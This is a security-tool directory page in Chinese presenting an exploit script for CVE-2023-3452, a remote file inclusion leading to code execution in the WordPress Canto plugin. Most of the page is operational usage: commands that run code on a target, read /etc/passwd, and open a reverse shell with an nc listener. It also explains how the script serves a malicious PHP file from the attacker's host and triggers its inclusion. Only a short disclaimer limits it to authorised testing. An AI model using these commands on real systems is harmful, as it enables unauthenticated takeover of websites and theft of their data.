Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — WordPress Canto插件RCE的CVE-2023-3452利用程序,包括HTTPS支持 | Kitploit
工具/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

WordPress Canto插件RCE的CVE-2023-3452利用程序,包括HTTPS支持

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
16个月前尚未审核

CVE-2023-3452 - WordPress Canto插件远程代码执行

针对WordPress Canto插件(≤ 3.0.4)RFI漏洞的利用程序。实际能在HTTPS上工作 —— 其他公开的PoC基本放弃了SSL。

功劳归功:此CVE由他人发现。我只是做了一个在HTTPS目标上不会崩溃的版本。

漏洞

CVECVE-2023-3452
EDB-ID51826
类型远程文件包含(RFI)→ 未认证远程代码执行
影响范围WordPress Canto插件 < 3.0.5 (≤ 3.0.4)
披露者Leopoldo Angulo (leoanggal1) — 2024-02-27
文件位置/wp-content/plugins/canto/includes/lib/download.php
攻击向量wp_abspath 未经任何验证就被用于包含PHP文件——我们远程包含我们的文件。

为什么选这个?

大多数针对此CVE的利用程序在HTTPS上失败是因为SSL验证。此脚本:

  • 使用 verify=False,因此HTTPS目标实际可用
  • 抑制urllib3警告信息的泛滥
  • 在HTTP和HTTPS上运行方式相同——无需单独配置

依赖要求

  • Python 3.6+
  • requests

安装

root@kitploit:~
pip install -r requirements.txt

或者直接:pip install requests

使用方法

root@kitploit:~
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [选项]

参数

* 未提供命令时,默认执行 id; whoami; hostname 作为快速检查

示例

单个命令:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

读取文件:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

反弹shell(先运行 nc -lvnp 4444):

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

交互模式:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

HTTPS CTF目标:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

工作原理

  1. 检查 — 访问 /wp-content/plugins/canto/readme.txt,解析版本(≤ 3.0.4 即为存在漏洞)
  2. Payload — 写入一个假的 wp-admin/admin.php,通过 system() 执行你的命令
  3. 服务 — 启动一个本地HTTP服务器,让目标能获取我们的文件
  4. 触发 — 请求 download.php 时附带 wp_abspath=http://LHOST:LPORT,使其包含我们的远程PHP文件
  5. 执行 — 目标服务器运行我们的代码,我们获取输出

网络注意事项

  • 目标必须能够通过 LHOST:LPORT 访问你的机器(对于HTB/实验室环境,那便是你的VPN IP)
  • 防火墙需要允许payload端口(-p)的入站连接

免责声明

仅用于授权测试和教育目的。只接触你被允许的系统。其他任何用途均属违法。

许可证

MIT

下载工具
选项描述必需
-t, --target目标WordPress URL(HTTP或HTTPS)是
-l, --lhost你的IP——目标需要能访问此IP以获取payload是
-p, --lportPayload服务端口(默认:8888)否
-c, --command在目标上执行的命令否*
--revshell生成反弹shell否
--shell-port反弹shell的监听端口(默认:4444)否
-i, --interactive交互式shell模式否
-v, --verbose额外输出否
--skip-check跳过漏洞检查否